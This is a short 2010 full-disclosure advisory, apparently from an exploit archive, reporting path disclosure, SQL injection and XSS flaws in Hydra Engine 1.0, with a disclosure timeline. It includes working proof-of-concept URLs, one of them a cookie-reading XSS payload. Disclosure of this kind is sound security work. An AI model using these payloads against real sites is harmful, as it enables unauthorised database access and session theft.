id: 11262
date: 03/11/2010
title: Hydra CMS Cross Site Scripting / SQL Injection Vulnerabilities
author: MustLive
cves: 

==============================================================
Hydra CMS Cross Site Scripting / SQL Injection Vulnerabilities
==============================================================

Hello Full-Disclosure!

I want to warn you about vulnerabilities in Hydra Engine. It's commercial
Ukrainian CMS.

-----------------------------
Timeline:

26.08.2009 - found the vulnerabilities.
28.08.2009 - announced at my site.
09.09.2009 - informed developers.
30.01.2010 - disclosed at my site.
-----------------------------
Details:

These are Full path disclosure, SQL Injection and Cross-Site Scripting
vulnerabilities.

Full path disclosure:

http://site/search/&#65533;/

SQL Injection:

http://site/search/'%20and%20version()%3E5--%20/

XSS:

http://site/search/'1%3Cbody%20onload=alert(document.cookie)%3E/

Vulnerable is Hydra Engine 1.0.

Best wishes & regards,
MustLive



#  0day.today [2023-03-21]  #